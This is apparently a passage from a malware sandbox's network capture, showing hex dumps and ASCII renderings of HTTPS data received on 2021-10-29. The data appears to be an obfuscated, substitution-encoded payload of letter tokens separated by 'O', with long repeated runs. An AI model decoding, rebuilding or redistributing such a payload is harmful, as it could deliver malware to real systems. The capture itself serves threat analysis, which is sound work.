                                                            Data Ascii: O Wp O Wm O qqO O qqW O XO O WE O qJO O qOO O EJ O qOD O mE O mE O mE O mE O mE O mE O Wm O qqE O qqm O qqp O mE O mE O qqq O Wm O EM O qOD O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE
                                                            2021-10-29 18:10:39 UTC1006INData Raw: 71 71 44 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 71 71 71 20 4f 20 57 4a 20 4f 20 45 45 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 57 4f 20 4f 20 71 4f 58 20 4f 20 71 4f 57 20 4f 20 58 71 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 45 44 20 4f 20 58 58 20 4f 20 71 4f 4d 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 45 6d 20 4f 20 58 71 20 4f 20 57 4a 20 4f 20 58 4a 20 4f 20 71 71 4d 20 4f 20 58 71 20 4f 20 71 71 4d 20 4f 20 45 44 20 4f 20 44 57 20 4f 20 44 58 20 4f 20 45 57 20 4f 20 71 4a 71 20 4f 20 45 4d 20 4f 20 58 4d 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20
                                                            Data Ascii: qqD O qqX O mE O qqq O WJ O EE O DW O mE O WO O qOX O qOW O Xq O XO O mp O ED O XX O qOM O EJ O mE O Em O Xq O WJ O XJ O qqM O Xq O qqM O ED O DW O DX O EW O qJq O EM O XM O qqm O mE O mE O mE O mE O mE O mE O mE O Wq O mE O mE O XO O mE O WE O mE O mE O
                                                            2021-10-29 18:10:39 UTC1007INData Raw: 20 57 4a 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 45 57 20 4f 20 71 4f 57 20 4f 20 71 71 71 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 71 71 6d 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45
                                                            Data Ascii: WJ O mE O mE O mE O mE O mE O mE O mp O EW O qOW O qqq O qqm O mE O Wm O mp O qqX O qqm O mE O mp O qqX O qqm O Wm O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE
                                                            2021-10-29 18:10:39 UTC1009INData Raw: 20 58 4f 20 4f 20 57 45 20 4f 20 71 4f 4f 20 4f 20 58 71 20 4f 20 71 4f 57 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 45 45 20 4f 20 71 4f 57 20 4f 20 44 4d 20 4f 20 45 44 20 4f 20 6d 4d 20 4f 20 71 4f 57 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 6d 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 57 57 20 4f 20 71 4f 4f 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 71 4f 71 20 4f 20 71 4f 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 58 45 20 4f 20 71 4a 71 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 44 58 20 4f 20 71 4a 4f 20 4f 20 4d 4d 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 71 71 58 20 4f 20 4d 58 20 4f 20 6d 45 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 4f 20 4f 20 71 71 45 20 4f 20 57 57 20 4f 20 58
                                                            Data Ascii: XO O WE O qOO O Xq O qOW O WW O mE O EE O qOW O DM O ED O mM O qOW O XW O qOp O DW O mX O mE O mM O WW O qOO O EJ O mE O Wm O qOq O qOD O XO O mE O WE O XX O XE O qJq O XO O mE O DX O qJO O MM O EJ O mE O qqX O MX O mE O DX O mE O mp O qqO O qqE O WW O X
                                                            2021-10-29 18:10:39 UTC1010INData Raw: 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 44 20 4f 20 57 71 20 4f 20 71 71 58 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 71 4f 4f 20 4f 20 57 57 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 58 58 20 4f 20 71 4f 71 20 4f 20 57 44 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58
                                                            Data Ascii: O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O XD O Wq O qqX O DX O mE O mM O qOO O WW O qqM O mE O WE O XX O qOq O WD O XO O mE O X
                                                            2021-10-29 18:10:39 UTC1011INData Raw: 20 4f 20 45 58 20 4f 20 71 4a 71 20 4f 20 71 71 57 20 4f 20 45 57 20 4f 20 57 57 20 4f 20 71 4f 44 20 4f 20 71 4f 45 20 4f 20 71 4a 4a 20 4f 20 44 44 20 4f 20 58 4d 20 4f 20 71 71 45 20 4f 20 71 4f 45 20 4f 20 71 71 4a 20 4f 20 71 71 70 20 4f 20 45 4a 20 4f 20 6d 45 20 4f 20 71 4f 4a 20 4f 20 58 4d 20 4f 20 44 44 20 4f 20 57 45 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 71 71 4a 20 4f 20 57 45 20 4f 20 71 4f 4a 20 4f 20 58 4f 20 4f 20 57 45 20 4f 20 57 4a 20 4f 20 71 4f 71 20 4f 20 71 71 4f 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 71 4f 4f 20 4f 20 57 71 20 4f 20 71 71 4a 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 45 58 20 4f 20 57 71 20 4f 20 71 4f 71 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 57 4a 20 4f 20 71 71 45 20 4f 20 57 44 20 4f 20 58 6d 20
                                                            Data Ascii: O EX O qJq O qqW O EW O WW O qOD O qOE O qJJ O DD O XM O qqE O qOE O qqJ O qqp O EJ O mE O qOJ O XM O DD O WE O mE O Wq O qqJ O WE O qOJ O XO O WE O WJ O qOq O qqO O qqm O mE O qOO O Wq O qqJ O Wm O mE O Wq O EX O Wq O qOq O XO O mp O WJ O qqE O WD O Xm
                                                            2021-10-29 18:10:39 UTC1013INData Raw: 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 70 20 4f 20 71 71 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 57 70 20 4f 20 71 71 45 20 4f 20 58 4d 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 4d 58 20 4f 20 71 4f 4d 20 4f 20 44 57 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 70 20 4f 20 71 4f 70 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 45 20 4f 20 45 45 20 4f 20
                                                            Data Ascii: O mE O mp O MX O qOM O DW O XO O mE O qOM O Wp O qOp O DX O mE O Wp O qqE O XM O DW O mE O mp O MX O qOM O DW O XO O mE O qOM O Wp O qOp O DX O mE O Wp O qqE O XM O DW O mE O mp O MX O qOM O DW O XO O mE O qOM O Wp O qOp O DX O mE O mE O mE O qqE O EE O
                                                            2021-10-29 18:10:39 UTC1014INData Raw: 44 57 20 4f 20 57 4f 20 4f 20 4d 58 20 4f 20 45 6d 20 4f 20 45 44 20 4f 20 45 70 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 4a 4a 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71
                                                            Data Ascii: DW O WO O MX O Em O ED O Ep O qOD O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O WE O mE O mE O qJJ O mE O mE O qOJ O mE O WD O mE O mE O qqm O mE O mp O qq
                                                            2021-10-29 18:10:39 UTC1015INData Raw: 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20
                                                            Data Ascii: Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm
                                                            2021-10-29 18:10:39 UTC1017INData Raw: 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20
                                                            Data Ascii: mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O
                                                            2021-10-29 18:10:39 UTC1018INData Raw: 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 71 71 6d 20 4f 20 6d 45 20 4f 20 6d 70 20
                                                            Data Ascii: mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp O qqX O mE O Wm O mE O mE O qqm O mE O mp
                                                            2021-10-29 18:10:39 UTC1019INData Raw: 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 6d
                                                            Data Ascii: E O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O mE O m
                                                            2021-10-29 18:10:39 UTC1021INData Raw: 4f 20 71 71 4d 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 58 45 20 4f 20 71 71 44 20 4f 20 45 44 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 57 4f 20 4f 20 4d 58 20 4f 20 4d 58 20 4f 20 44 57 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 71 4f 4d 20 4f 20 57 4f 20 4f 20 71 71 4d 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 4d 4f 20 4f 20 71 71 44 20 4f 20 45 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 71 71 6d 20 4f 20 58 6d 20 4f 20 44 45 20 4f 20 6d 45 20 4f 20 6d 70 20 4f 20 45 4d 20 4f 20 71 71 70 20 4f 20 71 71 58 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 71 4f 71 20 4f 20 71 71 4d 20 4f 20 57 44 20 4f 20 4d 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 44 58 20 4f 20 71 4f 71 20 4f 20 45 4f 20 4f 20 6d 45 20 4f 20 71 4a 4f 20 4f 20 4d 4d 20 4f 20 58 6d 20 4f
                                                            Data Ascii: O qqM O qOJ O mE O XE O qqD O ED O WW O mE O WO O MX O MX O DW O mE O WE O qOM O WO O qqM O XO O mE O MO O qqD O ED O mE O mE O Wq O qqm O Xm O DE O mE O mp O EM O qqp O qqX O qqX O mE O qOq O qqM O WD O MX O mE O mM O DX O qOq O EO O mE O qJO O MM O Xm O
                                                            2021-10-29 18:10:39 UTC1022INData Raw: 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4a 4a 20 4f 20 6d 45 20 4f 20 6d 58 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 44 4d 20 4f 20 44 45 20 4f 20 4d 58 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 58 4a 20 4f 20 44 57 20 4f 20 71 4f 4d 20 4f 20 57 71 20 4f 20 6d 45 20 4f 20 6d 58 20 4f 20 58 71 20 4f 20 45 6d 20 4f 20 71 71 44 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 44 4d 20 4f 20 44 4d 20 4f 20 4d 58 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 58 4a 20 4f 20 44 57 20 4f 20 45 71 20 4f 20 71 4a 4a 20 4f 20 6d 45 20 4f 20 6d 58 20 4f 20 58 71 20 4f 20 44 44 20 4f 20 71 71 57 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 57 44 20 4f 20 44 57 20 4f 20 4d 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 58 4f 20 4f 20 44 57 20
                                                            Data Ascii: J O DW O Eq O qJJ O mE O mX O Xq O DD O qqM O mE O WE O DM O DE O MX O qOJ O mE O XJ O DW O qOM O Wq O mE O mX O Xq O Em O qqD O mE O WE O DM O DM O MX O qqX O mE O XJ O DW O Eq O qJJ O mE O mX O Xq O DD O qqW O mE O WD O WD O DW O ME O mE O mE O XO O DW
                                                            2021-10-29 18:10:39 UTC1023INData Raw: 57 20 4f 20 58 70 20 4f 20 58 70 20 4f 20 45 45 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 45 70 20 4f 20 71 4a 4a 20 4f 20 71 4f 58 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 6d 4d 20 4f 20 45 58 20 4f 20 71 71 4a 20 4f 20 58 58 20 4f 20 6d 45 20 4f 20 57 6d 20 4f 20 44 58 20 4f 20 71 4f 57 20 4f 20 58 6d 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 57 45 20 4f 20 71 4f 71 20 4f 20 71 4f 4d 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 58 45 20 4f 20 58 4f 20 4f 20 45 70 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 57 4f 20 4f 20 58 71 20 4f 20 58 4a 20 4f 20 71 71 58 20 4f 20 6d 45 20 4f 20 71 4a 4f 20 4f 20 4d 4d 20 4f 20 44 44 20 4f 20 44 58 20 4f 20 45 71 20 4f 20 71 4f 70 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 45 58 20 4f 20 57 4f 20 4f 20 58
                                                            Data Ascii: W O Xp O Xp O EE O mE O mE O Ep O qJJ O qOX O qqX O mE O mM O EX O qqJ O XX O mE O Wm O DX O qOW O Xm O mE O WW O WE O qOq O qOM O XO O mE O XE O XO O Ep O WW O mE O WO O Xq O XJ O qqX O mE O qJO O MM O DD O DX O Eq O qOp O DW O DW O DW O DW O EX O WO O X
                                                            2021-10-29 18:10:39 UTC1025INData Raw: 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57
                                                            Data Ascii: O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW O DW
                                                            2021-10-29 18:10:39 UTC1026INData Raw: 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 57 20 4f 20 44 44 20 4f 20 71 71 70 20 4f 20 58 45 20 4f 20 71 4f 70 20 4f 20 45 57 20 4f 20 58 57 20 4f 20 4d 4f 20 4f 20 58 44 20 4f 20 45 45 20 4f 20 44 58 20 4f 20 71 4a 71 20 4f 20 57 4f 20 4f 20 45 58 20 4f 20 58 70 20 4f 20 44 57 20 4f 20 57 45 20 4f 20 45 4f 20 4f 20 71 4f 44 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 58 4f 20 4f 20 58 4a 20 4f 20 58 4d 20 4f 20 6d 4d 20 4f 20 45 70 20 4f 20 44 58 20 4f 20 6d 58 20 4f 20 58 45 20 4f 20 45 58 20 4f 20 58 70 20 4f 20 44 57 20 4f 20 57 45 20 4f 20 45 4f 20 4f 20 71 4f 44 20 4f 20 58 57 20 4f 20 71 4f 70 20 4f 20 58 4f 20 4f 20 58 4a 20 4f 20 58 4d 20 4f 20 6d 4d 20 4f 20 45 70 20 4f 20 44 58 20 4f 20 6d
                                                            Data Ascii: O DW O DW O DW O DW O DW O DW O DW O DD O qqp O XE O qOp O EW O XW O MO O XD O EE O DX O qJq O WO O EX O Xp O DW O WE O EO O qOD O XW O qOp O XO O XJ O XM O mM O Ep O DX O mX O XE O EX O Xp O DW O WE O EO O qOD O XW O qOp O XO O XJ O XM O mM O Ep O DX O m
                                                            2021-10-29 18:10:39 UTC1027INData Raw: 70 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 45 4f 20 4f 20 71 4f 45 20 4f 20 57 70 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 71 71 4d 20 4f 20 4d 58 20 4f 20 57 4f 20 4f 20 58 4f 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 45 4a 20 4f 20 45 57 20 4f 20 57 4f 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 57 6d 20 4f 20 71 71 58 20 4f 20 57 44 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 71 71 4d 20 4f 20 71 71 57 20 4f 20 71 4f 4a 20 4f 20 45 4d 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 57 71 20 4f 20 71 4f 57 20 4f 20 57 6d 20 4f 20 71 4f 4a 20 4f 20 6d 45 20 4f 20 71 4f 4f 20 4f 20 57 4a 20 4f 20 71 71 45 20 4f 20 71 71 4f 20 4f 20 6d 45 20 4f 20 57 71 20 4f 20 71 4f 71 20 4f 20 45 44 20 4f 20 71 71 4a 20 4f 20 6d 45 20 4f 20 57 45 20 4f 20 57 71 20 4f 20 71 4f 57 20 4f 20
                                                            Data Ascii: p O qOJ O mE O EO O qOE O Wp O XO O mE O qqM O MX O WO O XO O mE O WD O EJ O EW O WO O XO O mp O Wm O qqX O WD O qOJ O mE O qqM O qqW O qOJ O EM O mE O WE O Wq O qOW O Wm O qOJ O mE O qOO O WJ O qqE O qqO O mE O Wq O qOq O ED O qqJ O mE O WE O Wq O qOW O
                                                            2021-10-29 18:10:39 UTC1029INData Raw: 6d 45 20 4f 20 71 4f 4d 20 4f 20 57 6d 20 4f 20 71 71 45 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 57 4a 20 4f 20 45 58 20 4f 20 71 4a 71 20 4f 20 57 6d 20 4f 20 6d 45 20 4f 20 57 44 20 4f 20 45 71 20 4f 20 57 45 20 4f 20 71 4f 44 20 4f 20 6d 45 20 4f 20 6d 45 20 4f 20 45 71 20 4f 20 71 4a 4a 20 4f 20 57 45 20 4f 20 57 57 20 4f 20 6d 45 20 4f 20 71 71 45 20 4f 20 4d 4d 20 4f 20 45 44 20 4f 20 58 71 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 71 71 4f 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 58 4f 20 4f 20 6d 70 20 4f 20 57 70 20 4f 20 71 71 4d 20 4f 20 71 71 44 20 4f 20 44 58 20 4f 20 6d 45 20 4f 20 71 71 45 20 4f 20 4d 4d 20 4f 20 45 44 20 4f 20 58 71 20 4f 20 6d 45 20 4f 20 57 57 20 4f 20 71 71 4f 20 4f 20 44 45 20 4f 20 6d 58 20 4f 20 58 4f 20 4f 20 6d 70 20
                                                            Data Ascii: mE O qOM O Wm O qqE O qOD O mE O WJ O EX O qJq O Wm O mE O WD O Eq O WE O qOD O mE O mE O Eq O qJJ O WE O WW O mE O qqE O MM O ED O Xq O mE O WW O qqO O DE O mX O XO O mp O Wp O qqM O qqD O DX O mE O qqE O MM O ED O Xq O mE O WW O qqO O DE O mX O XO O mp
